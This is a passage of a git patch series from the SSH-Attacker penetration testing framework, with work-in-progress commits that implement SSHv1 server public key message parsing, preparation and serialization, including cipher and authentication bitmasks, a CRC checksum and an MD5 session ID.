ArrayConverter.intToBytes(message.getCipherMask().getValue(), 4)); + + int cipherMask = message.getCipherMask().getValue(); + String stringCipherMask = Integer.toBinaryString(cipherMask); + List supportedCipherMethods = new ArrayList<>(); + for (int i = 0; i < stringCipherMask.length(); i++) { + if (stringCipherMask.charAt(i) == '1') { + int id = stringCipherMask.length() - 1 - i; + supportedCipherMethods.add(CipherMethod.fromId(id)); + LOGGER.debug("Parsed Authentiationmethod {} at id {}", CipherMethod.fromId(id), id); + } + } + + message.setSupportedCipherMethods(supportedCipherMethods); + } + + private void parseAuthMask(ServerPublicKeyMessage message) { + message.setAuthMask(parseIntField(4)); + LOGGER.debug( + "AuthMask: {}", ArrayConverter.intToBytes(message.getAuthMask().getValue(), 4)); + + int authMask = message.getAuthMask().getValue(); + String stringAuthMask = Integer.toBinaryString(authMask); + List supportedAuthenticationMethods = new ArrayList<>(); + for (int i = 0; i < stringAuthMask.length(); i++) { + if (stringAuthMask.charAt(i) == '1') { + int id = stringAuthMask.length() - 1 - i; + supportedAuthenticationMethods.add(AuthenticationMethodSSHv1.fromId(id)); + LOGGER.debug( + "Parsed Authentiationmethod {} at id {}", + AuthenticationMethodSSHv1.fromId(id), + id); + } + } + + message.setSupportedAuthenticationMethods(supportedAuthenticationMethods); + } + + private void parseCRC(ServerPublicKeyMessage message) { + byte[] CRC = parseByteArrayField(4); + LOGGER.debug("CRC: {}", CRC); + } + + /* private void parseHybridKey(ServerPublicKeyMessage message) { int length = parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); LOGGER.debug("Total Length: " + length); @@ -135,7 +230,7 @@ private void parseHybridKey(ServerPublicKeyMessage message) { LOGGER.warn("combiner not supported. Can not update message"); break; } - } + }*/ /* private void parseSignature(ServerPublicKeyMessage message) { message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); @@ -149,6 +244,11 @@ protected void parseMessageSpecificContents(ServerPublicKeyMessage message) { parseAntiSpoofingCookie(message); parseServerKeyBytes(message); parseHostKeyBytes(message); + parseProtocolFlags(message); + parseCipherMask(message); + parseAuthMask(message); + parseCRC(message); + // parseHybridKey(message); // parseSignature(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index 3a0b687be..d17330661 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -8,26 +8,20 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; -import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; -import de.rub.nds.sshattacker.core.constants.PublicKeyFormat; -import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; -import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.KeyAgreement; -import de.rub.nds.sshattacker.core.crypto.kex.KeyEncapsulation; +import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.security.KeyPair; import java.security.KeyPairGenerator; import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPrivateKey; import java.security.interfaces.RSAPublicKey; +import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -44,6 +38,16 @@ public ServerPublicKeyMessagePreparator( this.combiner = combiner; } + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + prepareServertKey(); + prepareHostKey(); + prepareAntiSpoofingCookie(); + prepareSupportedCipers(); + prepareSupportedAuthenticationMethods(); + } + public void generateServerKey() throws CryptoException { int transientKeyLength = 786; // Bit, default Value referring to RFC try { @@ -60,16 +64,34 @@ public void generateServerKey() throws CryptoException { } } - @Override - public void prepareMessageSpecificContents() { - LOGGER.debug("Preparring now..."); + public void prepareHostKey() { int hostKeylenght; - int serverKeyLenght; + SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(0); + + CustomRsaPublicKey pubkey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); + SshPublicKey hostKey = + new SshPublicKey<>(PublicKeyFormat.SSH_RSA, pubkey); - // *SSHV1*// + getObject().setHostKey(hostKey); - // ServerKey - SshPublicKey hostkey; + CustomRsaPublicKey publicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); + hostKeylenght = publicKey.getPublicExponent().bitLength(); + hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); + getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); + getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); + getObject().setHostKeyByteLenght(hostKeylenght / 8); + + LOGGER.debug( + "[bro] Hostkey Exponent: {}", + ArrayConverter.bytesToHexString(publicKey.getPublicExponent().toByteArray())); + LOGGER.debug( + "[bro] Hostkey Modulus: {}", + ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); + } + + public void prepareServertKey() { + + int serverKeyLenght; try { generateServerKey(); } catch (CryptoException e) { @@ -86,21 +108,6 @@ public void prepareMessageSpecificContents() { .setServerPublicExponent( serverKey.getPublicKey().getPublicExponent().toByteArray()); - byte[] concatenated; - - concatenated = - KeyExchangeUtil.concatenateHybridKeys( - serverKey.getPublicKey().getModulus().toByteArray(), - serverKey.getPublicKey().getPublicExponent().toByteArray()); - - getObject().setServerKeyBytes(concatenated); - LOGGER.debug( - "[bro] concatenated server key lenght: {} vs calculated: {}", - concatenated.length, - serverKeyLenght / 8); - - getObject().setServerKeyByteLenght(concatenated.length); - LOGGER.debug( "[bro] ServerKey Exponent: {}", ArrayConverter.bytesToHexString( @@ -109,108 +116,52 @@ public void prepareMessageSpecificContents() { "[bro] ServerKey Modulus: {}", ArrayConverter.bytesToHexString( serverKey.getPublicKey().getModulus().toByteArray())); + } - SshPublicKey hostKey = chooser.getConfig().getHostKeys().get(0); + public void prepareSupportedCipers() { + int ciphers = 0; - // Hostkey - // Optional> hostKey = chooser.getContext().getSshContext().getHostKey(); - /* if (hostKey.isPresent()) { - CustomRsaPublicKey publicKey = (CustomRsaPublicKey) hostKey.get().getPublicKey(); - hostKeylenght = publicKey.getPublicExponent().bitLength(); - hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); - getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); - getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); - getObject().setHostKeyBits(hostKeylenght); + List supportedCipherMethods = chooser.getConfig().getSupportedCipherMethods(); - LOGGER.debug( - "[bro] Hostkey Exponent: {}", - ArrayConverter.bytesToHexString(publicKey.getPublicExponent().toByteArray())); - LOGGER.debug( - "[bro] Hostkey Modulus: {}", - ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); - } else { - LOGGER.error("Got no Hostkey!"); - throw new RuntimeException("error"); - }*/ + for (CipherMethod method : supportedCipherMethods) { + int shifter = method.getId(); + int helper = 1; - CustomRsaPublicKey publicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); - hostKeylenght = publicKey.getPublicExponent().bitLength(); - hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); - getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); - getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); - getObject().setHostKeyByteLenght(hostKeylenght / 8); + helper = helper << shifter; + ciphers = ciphers | helper; + LOGGER.debug("got {} shifted {}-times", CipherMethod.fromId(method.getId()), shifter); + } - concatenated = - KeyExchangeUtil.concatenateHybridKeys( - publicKey.getModulus().toByteArray(), - publicKey.getPublicExponent().toByteArray()); + getObject().setCipherMask(ciphers); - getObject().setHostKeyBytes(concatenated); + getObject().setSupportedCipherMethods(chooser.getConfig().getSupportedCipherMethods()); + } - getObject().setHostKeyByteLenght(concatenated.length); + public void prepareSupportedAuthenticationMethods() { + int authMask = 0; + List supportedAuthenticationMethods = + chooser.getConfig().getSupportedAuthenticationMethods(); - LOGGER.debug( - "[bro] concatenated host key lenght: {} vs calculated: {}", - concatenated.length, - hostKeylenght / 8); + for (AuthenticationMethodSSHv1 method : supportedAuthenticationMethods) { + int shifter = method.getId(); + int helper = 1; - LOGGER.debug( - "[bro] Hostkey Exponent: {}", - ArrayConverter.bytesToHexString(publicKey.getPublicExponent().toByteArray())); - LOGGER.debug( - "[bro] Hostkey Modulus: {}", - ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); + helper = helper << shifter; + authMask = authMask | helper; + LOGGER.debug( + "got {} shifted {}-times", + AuthenticationMethodSSHv1.fromId(method.getId()), + shifter); + } - // AntiSpoofingCookie - getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); + getObject() + .setSupportedAuthenticationMethods( + chooser.getConfig().getSupportedAuthenticationMethods()); - // *SSHV1*// - /* - KeyExchangeUtil.prepareHostKeyMessage(chooser.getContext().getSshContext(), getObject()); - prepareHybridKey(); - chooser.getHybridKeyExchange().combineSharedSecrets(); - chooser.getContext() - .getSshContext() - .setSharedSecret(chooser.getHybridKeyExchange().getSharedSecret()); - chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setSharedSecret(chooser.getHybridKeyExchange().getSharedSecret()); - KeyExchangeUtil.computeExchangeHash(chooser.getContext().getSshContext()); - KeyExchangeUtil.prepareExchangeHashSignatureMessage( - chooser.getContext().getSshContext(), getObject()); - KeyExchangeUtil.setSessionId(chooser.getContext().getSshContext()); - KeyExchangeUtil.generateKeySet(chooser.getContext().getSshContext());*/ + getObject().setAuthMask(authMask); } - private void prepareHybridKey() { - HybridKeyExchange keyExchange = chooser.getHybridKeyExchange(); - KeyAgreement agreement = keyExchange.getKeyAgreement(); - KeyEncapsulation encapsulation = keyExchange.getKeyEncapsulation(); - agreement.generateLocalKeyPair(); - encapsulation.encryptSharedSecret(); - - ExchangeHashInputHolder inputHolder = - chooser.getContext().getSshContext().getExchangeHashInputHolder(); - byte[] agreementBytes = agreement.getLocalKeyPair().getPublic().getEncoded(); - byte[] encapsulationBytes = encapsulation.getEncryptedSharedSecret(); - getObject().setPublicKey(agreementBytes, true); - getObject().setCiphertext(encapsulationBytes, true); - byte[] concatenated; - switch (combiner) { - case CLASSICAL_CONCATENATE_POSTQUANTUM: - concatenated = - KeyExchangeUtil.concatenateHybridKeys(agreementBytes, encapsulationBytes); - inputHolder.setHybridServerPublicKey(concatenated); - break; - case POSTQUANTUM_CONCATENATE_CLASSICAL: - concatenated = - KeyExchangeUtil.concatenateHybridKeys(encapsulationBytes, agreementBytes); - inputHolder.setHybridServerPublicKey(concatenated); - break; - default: - LOGGER.warn("combiner is not supported. Can not set Hybrid Key."); - break; - } + public void prepareAntiSpoofingCookie() { + getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index e4adb0bb3..625977711 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -8,11 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; +import java.util.zip.CRC32; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -32,9 +31,36 @@ public void serializeMessageSpecificContents() { serializeCookie(); serializeServerKeyBytes(); serializeHostKeyBytes(); - // serializeHybridKey(); - // serializeSignature(); + serializeProtocolFlags(); + serializeCipherMask(); + serializeSupportedAuthMask(); + serializCRCChecksum(); + } + + private void serializeProtocolFlags() { + byte[] flags = new byte[4]; + appendBytes(flags); + LOGGER.debug("Flags: " + ArrayConverter.bytesToRawHexString(flags)); + } + + private void serializeCipherMask() { + int ciphers = message.getCipherMask().getValue(); + appendInt(ciphers, 4); + LOGGER.debug("Cipher: " + Integer.toBinaryString(ciphers)); + } + + private void serializeSupportedAuthMask() { + int authMask = message.getAuthMask().getValue(); + appendInt(authMask, 4); + LOGGER.debug("AuthMasks: " + Integer.toBinaryString(authMask)); + } + private void serializCRCChecksum() { + CRC32 crc = new CRC32(); + crc.update(getAlreadySerialized()); + byte[] checksum = ArrayConverter.longToBytes(crc.getValue(), 4); + appendBytes(checksum); + LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); } private void serializeCookie() { @@ -46,71 +72,40 @@ private void serializeCookie() { } private void serializeServerKeyBytes() { - appendInt( - message.getServerKeyByteLength().getValue(), - DataFormatConstants.STRING_SIZE_LENGTH); - LOGGER.debug("Host key bytes length: " + message.getServerKeyByteLength().getValue()); + appendInt(message.getServerKey().getPublicKey().getModulus().bitLength(), 4); - appendBytes(message.getServerKeyBytes().getValue()); + appendMultiPrecision(message.getServerKey().getPublicKey().getPublicExponent()); LOGGER.debug( - "Host key bytes: " - + ArrayConverter.bytesToRawHexString( - message.getServerKeyBytes().getValue())); + "Added Public Host Exponent with value {}", + ArrayConverter.bytesToHexString( + message.getServerKey().getPublicKey().getPublicExponent().toByteArray())); + + appendMultiPrecision(message.getServerKey().getPublicKey().getModulus()); + LOGGER.debug( + "Added Public Host Modulus with value {}", + ArrayConverter.bytesToHexString( + message.getServerKey().getPublicKey().getModulus().toByteArray())); } private void serializeHostKeyBytes() { - appendInt( - message.getHostKeyByteLenght().getValue(), DataFormatConstants.STRING_SIZE_LENGTH); - LOGGER.debug("Host key bytes length: " + message.getHostKeyByteLenght().getValue()); - appendBytes(message.getHostKeyBytes().getValue()); + appendInt(message.getHostKey().getPublicKey().getModulus().bitLength(), 4); + appendMultiPrecision(message.getHostKey().getPublicKey().getPublicExponent()); LOGGER.debug( - "Host key bytes: " - + ArrayConverter.bytesToRawHexString(message.getHostKeyBytes().getValue())); - } + "Added Public Host Exponent with value {}", + ArrayConverter.bytesToHexString( + message.getHostKey().getPublicKey().getPublicExponent().toByteArray())); - private void serializeHybridKey() { - int length = - message.getPublicKeyLength().getValue() - + message.getCombinedKeyShareLength().getValue(); - appendInt(length, DataFormatConstants.MPINT_SIZE_LENGTH); - LOGGER.debug("Hybrid Key (server) length: " + length); - byte[] combined; - switch (combiner) { - case CLASSICAL_CONCATENATE_POSTQUANTUM: - combined = - KeyExchangeUtil.concatenateHybridKeys( - message.getPublicKey().getValue(), - message.getCombinedKeyShare().getValue()); - appendBytes(combined); - break; - case POSTQUANTUM_CONCATENATE_CLASSICAL: - combined = - KeyExchangeUtil.concatenateHybridKeys( - message.getCombinedKeyShare().getValue(), - message.getPublicKey().getValue()); - appendBytes(combined); - break; - default: - LOGGER.warn( - "The used combiner" + combiner + " is not supported, can not append Bytes"); - combined = new byte[0]; - break; - } - LOGGER.debug("Hybrid Key (server): " + combined); + appendMultiPrecision(message.getHostKey().getPublicKey().getModulus()); + LOGGER.debug( + "Added Public Host Modulus with value {}", + ArrayConverter.bytesToHexString( + message.getHostKey().getPublicKey().getModulus().toByteArray())); } - /* - private void serializeSignature() { - appendInt(message.getSignatureLength().getValue(), DataFormatConstants.STRING_SIZE_LENGTH); - LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); - appendBytes(message.getSignature().getValue()); - LOGGER.debug("Signature: " + message.getSignature()); - }*/ @Override protected byte[] serializeBytes() { super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); LOGGER.debug( "[bro] SSHV1 serializied PubKey Message. Content: {}", ArrayConverter.bytesToHexString(getAlreadySerialized())); From 1cd5df1c9fac05b74e11626d9aecde44409b5a94 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 6 Aug 2023 15:53:35 +0200 Subject: [PATCH 051/176] wip: Implementing SSH_SMSG_PUBLIC_KEY-Message --- .../nds/sshattacker/core/config/Config.java | 16 +++++ .../core/constants/ProtocolFlag.java | 43 +++++++++++++ .../core/layer/context/SshContext.java | 10 +++ .../ServerPublicKeyMessageHandler.java | 19 ++++++ .../VersionExchangeMessageSSHV1Handler.java | 26 -------- .../ssh1/message/ServerPublicKeyMessage.java | 61 ++++++++++++++++--- .../message/VersionExchangeMessageSSHV1.java | 8 --- .../parser/ServerPublicKeyMessageParser.java | 26 +++++--- .../VersionExchangeMessageSSHV1Parser.java | 13 ---- .../ServerPublicKeyMessagePreparator.java | 55 +++++++++++++---- ...VersionExchangeMessageSSHV1Preparator.java | 8 --- .../ServerPublicKeyMessageSerializer.java | 11 ++-- .../factory/WorkflowConfigurationFactory.java | 9 +-- 13 files changed, 213 insertions(+), 92 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolFlag.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 7b8f7a1a0..f53804509 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -114,6 +114,10 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { @XmlElementWrapper private List supportedAuthenticationMethods; + @XmlElement(name = "protocolFlag") + @XmlElementWrapper + private List chosenProtocolFlags; + /** List of key exchange algorithms supported by the remote peer */ @XmlElement(name = "clientSupportedKeyExchangeAlgorithm") @XmlElementWrapper @@ -518,6 +522,10 @@ public Config() { ArrayConverter.hexStringToByteArray( "0000000000000000"); // 16 Byte Anti-Spoofing-Cookie + chosenProtocolFlags = + Arrays.stream(new ProtocolFlag[] {}) + .collect(Collectors.toCollection(LinkedList::new)); + supportedCipherMethods = Arrays.stream(new CipherMethod[] {CipherMethod.SSH_CIPHER_3DES}) .collect(Collectors.toCollection(LinkedList::new)); @@ -1738,4 +1746,12 @@ public void setSupportedAuthenticationMethods( List supportedAuthenticationMethods) { this.supportedAuthenticationMethods = supportedAuthenticationMethods; } + + public List getChosenProtocolFlags() { + return chosenProtocolFlags; + } + + public void setChosenProtocolFlags(List chosenProtocolFlags) { + this.chosenProtocolFlags = chosenProtocolFlags; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolFlag.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolFlag.java new file mode 100644 index 000000000..22b4cf5d2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolFlag.java @@ -0,0 +1,43 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +import java.util.Collections; +import java.util.Map; +import java.util.TreeMap; + +public enum ProtocolFlag { + + // Ciphermethods from ssh1.2.28 + SSH_PROTOFLAG_SCREEN_NUMBER(1), + SSH_PROTOFLAG_HOST_IN_FWD_OPEN(2); + + private final int id; + + public static final Map map; + + static { + Map mutableMap = new TreeMap<>(); + for (ProtocolFlag constant : ProtocolFlag.values()) { + mutableMap.put(constant.id, constant); + } + map = Collections.unmodifiableMap(mutableMap); + } + + ProtocolFlag(int id) { + this.id = id; + } + + public int getId() { + return id; + } + + public static ProtocolFlag fromId(int id) { + return map.get(id); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index e858bb1f2..b8ce48dcd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -257,6 +257,8 @@ public PacketCipher getActiveDecryptCipher() { private byte[] sharedSecret; /** The key set derived from the shared secret, the exchange hash, and the session ID */ private KeySet keySet; + + private byte[] sshv1SessionID; // endregion /* public MessageLayer getMessageLayer() { @@ -1045,4 +1047,12 @@ public boolean isHandleAsClient() { public void setHandleAsClient(boolean handleAsClient) { this.handleAsClient = handleAsClient; } + + public byte[] getSshv1SessionID() { + return sshv1SessionID; + } + + public void setSshv1SessionID(byte[] sshv1SessionID) { + this.sshv1SessionID = sshv1SessionID; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index a962f236a..d442c3343 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -13,6 +13,10 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import java.nio.charset.StandardCharsets; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; + public class ServerPublicKeyMessageHandler extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -29,6 +33,21 @@ public ServerPublicKeyMessageHandler(SshContext context) { @Override public void adjustContext(ServerPublicKeyMessage message) { + String serverKeyModulus = new String(message.getServerKey().getPublicKey().getModulus().toByteArray(), StandardCharsets.UTF_8); + String hostKeyModulus = new String(message.getHostKey().getPublicKey().getModulus().toByteArray(), StandardCharsets.UTF_8); + String cookie = new String(message.getAntiSpoofingCookie().getValue(), StandardCharsets.UTF_8); + + String concatenated = serverKeyModulus + hostKeyModulus + cookie; + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + md.update(concatenated.getBytes(StandardCharsets.UTF_8)); + byte[] digest = md.digest(); + sshContext.setSshv1SessionID(digest); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } + + // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); // setRemoteValues(message); /* sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java index 2a12eddac..583beef08 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java @@ -18,40 +18,14 @@ public VersionExchangeMessageSSHV1Handler(SshContext context) { super(context); } - /*public VersionExchangeMessageHandler(SshContext context, VersionExchangeMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(VersionExchangeMessageSSHV1 message) { if (sshContext.isHandleAsClient()) { sshContext.setServerVersion(message.getVersion().getValue()); sshContext.setServerComment(message.getComment().getValue()); - // sshContext.getExchangeHashInputHolder().setServerVersion(message); } else { sshContext.setClientVersion(message.getVersion().getValue()); sshContext.setClientComment(message.getComment().getValue()); - // sshContext.getExchangeHashInputHolder().setClientVersion(message); } } - - /*@Override - public VersionExchangeMessageParser getParser(byte[] array) { - return new VersionExchangeMessageParser(array); - } - - @Override - public VersionExchangeMessageParser getParser(byte[] array, int startPosition) { - return new VersionExchangeMessageParser(array, startPosition); - } - - @Override - public VersionExchangeMessagePreparator getPreparator() { - return new VersionExchangeMessagePreparator(context.getChooser(), message); - } - - @Override - public VersionExchangeMessageSerializer getSerializer() { - return new VersionExchangeMessageSerializer(message); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java index 4dfebcef8..927615f61 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; import de.rub.nds.sshattacker.core.constants.CipherMethod; +import de.rub.nds.sshattacker.core.constants.ProtocolFlag; import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; @@ -36,6 +37,7 @@ public class ServerPublicKeyMessage extends SshMessage { private ModifiableByteArray serverPublicExponent; private ModifiableByteArray serverPublicModulus; + private ModifiableInteger serverKeyBitLenght; private ModifiableByteArray serverKeyBytes; // Host Key @@ -45,15 +47,18 @@ public class ServerPublicKeyMessage extends SshMessage { private ModifiableByteArray hostPublicModulus; private ModifiableByteArray hostKeyBytes; + private ModifiableInteger hostKeyBitLenght; + // Other Values private ModifiableByteArray antiSpoofingCookie; - private ModifiableByteArray protocolFlags; + private ModifiableInteger protocolFlagMask; private ModifiableInteger cipherMask; private ModifiableInteger authMask; private List supportedCipherMethods; + private List chosenProtocolFlags; private List supportedAuthenticationMethods; @@ -77,6 +82,8 @@ public SshPublicKey getHostKey() { public void setHostKey(SshPublicKey hostKey) { this.hostKey = hostKey; + setHostPublicModulus(this.hostKey.getPublicKey().getModulus().toByteArray()); + setHostPublicExponent(this.hostKey.getPublicKey().getPublicExponent().toByteArray()); } public ModifiableInteger getHostKeyByteLenght() { @@ -138,6 +145,9 @@ public SshPublicKey getServerKey() { public void setServerKey(SshPublicKey serverKey) { this.serverKey = serverKey; + setServerPublicModulus(this.serverKey.getPublicKey().getModulus().toByteArray()); + setServerPublicExponent(this.serverKey.getPublicKey().getPublicExponent().toByteArray()); + // this.serverPublicExponent = serverKey.getPublicKey().getPublicExponent().byteValue(); // //toModifiableByteArry.... // this.serverPublicModulus = serverKey.getPublicKey().getModulus().byteValue(); @@ -197,17 +207,17 @@ public void setServerKeyByteLenght(int serverKeyBits) { ModifiableVariableFactory.safelySetValue(this.serverKeyByteLength, serverKeyBits); } - public ModifiableByteArray getProtocolFlags() { - return protocolFlags; + public ModifiableInteger getProtocolFlagMask() { + return protocolFlagMask; } - public void setProtocolFlags(ModifiableByteArray protocolFlags) { - this.protocolFlags = protocolFlags; + public void setProtocolFlagMask(ModifiableInteger protocolFlagMask) { + this.protocolFlagMask = protocolFlagMask; } - public void setProtocolFlags(byte[] protocolFlags) { - this.protocolFlags = - ModifiableVariableFactory.safelySetValue(this.protocolFlags, protocolFlags); + public void setProtocolFlagMask(int protocolFlags) { + this.protocolFlagMask = + ModifiableVariableFactory.safelySetValue(this.protocolFlagMask, protocolFlags); } public ModifiableInteger getCipherMask() { @@ -251,6 +261,41 @@ public void setSupportedAuthenticationMethods( this.supportedAuthenticationMethods = supportedAuthenticationMethods; } + public ModifiableInteger getServerKeyBitLenght() { + return serverKeyBitLenght; + } + + public void setServerKeyBitLenght(ModifiableInteger serverKeyBitLenght) { + this.serverKeyBitLenght = serverKeyBitLenght; + } + + public void setServerKeyBitLenght(int serverKeyBitLenght) { + this.serverKeyBitLenght = + ModifiableVariableFactory.safelySetValue( + this.serverKeyBitLenght, serverKeyBitLenght); + } + + public ModifiableInteger getHostKeyBitLenght() { + return hostKeyBitLenght; + } + + public void setHostKeyBitLenght(ModifiableInteger hostKeyBitLenght) { + this.hostKeyBitLenght = hostKeyBitLenght; + } + + public void setHostKeyBitLenght(int hostKeyBitLenght) { + this.hostKeyBitLenght = + ModifiableVariableFactory.safelySetValue(this.hostKeyBitLenght, hostKeyBitLenght); + } + + public List getChosenProtocolFlags() { + return chosenProtocolFlags; + } + + public void setChosenProtocolFlags(List chosenProtocolFlags) { + this.chosenProtocolFlags = chosenProtocolFlags; + } + private ModifiableInteger publicKeyLength; @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java index 1e905d0f3..e7413adc3 100644 --- 